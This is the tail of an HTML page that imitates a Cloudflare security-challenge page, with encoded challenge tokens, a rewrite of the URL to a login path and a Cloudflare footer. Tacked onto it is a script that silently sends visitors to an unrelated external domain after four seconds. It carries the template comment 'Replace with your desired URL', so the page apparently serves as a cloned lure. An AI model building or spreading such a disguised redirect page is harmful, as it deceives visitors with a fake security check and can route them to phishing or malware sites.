            d: "PaVzKCZls45yGoDU2HlnLTI7AgnMWm8SWMm5ypCen17B8mWLhRkmf08IaxOM7cKtagAyThBUMdD3tY8rYT+arVme7ocaE65J3IGCRrxQCQjDA8EiArHtgwreWYfVtYv+FHKGvcy53kJ6jqxEEPFr7b8OdkTn9SfLTLRG+LJ9jOF7nzQJ/r7mupPQV3T0YPOHqKKNbxeP7NeFue60BnJVKRC4ULaOakAiBynZF96rWymPH3ZrpGxklkkejReNSCjjtOfibH/kNPGnjDgFEHzlIcKZp5bq8W3NMnapo6NRWFnarb1EY4JM6IcGuRHu5vYbUdAFbt9ZV29LZvQ2LB7Vys/vw0YtZEuiTCxHVLU1w+r83teculZYEWwLLakFyxwZxgbFiU6aXaLIHXGnOrD1nG5CFVWvWpSKp3q5LIGUNzDHfRU6+gvOFLvksd5bIsaGMPl3Tov7SZahlY4gW5tYNf2Q96Ug5unlFO8bOI8wPFrSAST6wQvYRClS5OSOEJSCaYyoq1yuJvS7pTioTWpyqA==",
            t: "MTcyNDg4OTk4MS4wMDAwMDA=",
            cT: Math.floor(Date.now() / 1000),
            m: "gY4kB8EkqVrQwzcLYm5GSqxqxgiwxLpciTPbCsIdtBM=",
            i1: "K+qDrBQNCwQxqgUc/05Y2Q==",
            i2: "ZQBBROJkdhCjC30rQd9VRg==",
            zh: "qayfZG1taVCcLxDZ6k99cDfVMUIg7i2niVq00ghjcsE=",
            uh: "rWFtZGJE4Oa38UgkpzLxSaFRrp2i6jLI2EFiVAp7Oms=",
            hh: "lCtru2Ew3vFFhBBCokLMIrjN1cT4Z42/rhvD7ummRvM=",
          },
        };
        var cpo = document.createElement("script");
        cpo.src =
          "/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8ba84b70fa49cf8b";
        window._cf_chl_opt.cOgUHash =
          location.hash === "" && location.href.indexOf("#") !== -1
            ? "#"
            : location.hash;
        window._cf_chl_opt.cOgUQuery =
          location.search === "" &&
          location.href
            .slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length)
            .indexOf("?") !== -1
            ? "?"
            : location.search;
        if (window.history && window.history.replaceState) {
          var ogU =
            location.pathname +
            window._cf_chl_opt.cOgUQuery +
            window._cf_chl_opt.cOgUHash;
          history.replaceState(
            null,
            null,
            "\/login?__cf_chl_rt_tk=.n2D9073ZhO1VAxR5.zWI50xBKEl7KhaPlqjra8bq8g-1724889981-0.0.1.1-6441" +
              window._cf_chl_opt.cOgUHash
          );
          cpo.onload = function () {
            history.replaceState(null, null, ogU);
          };
        }
        document.getElementsByTagName("head")[0].appendChild(cpo);
      })();
    </script>
<script>
      setTimeout(function(){
        window.location.href = "https://lifeontechji.za.com/R158Y/"; // Replace with your desired URL
      }, 4000); // 4000 milliseconds = 4 seconds
    </script>
    <div class="footer" role="contentinfo">
      <div class="footer-inner">
        <div class="clearfix diagnostic-wrapper">
          <div class="ray-id">Ray ID: <code>8ba84b70fa49cf8b</code></div>
        </div>
        <div class="text-center" id="footer-text">
          Performance &amp; security by
          <a
            rel="noopener noreferrer"
            href="https://www.cloudflare.com?utm_source=challenge&amp;utm_campaign=j"
            target="_blank"
            >Cloudflare</a
          >
        </div>
      </div>
    </div>
  </body>
</html>
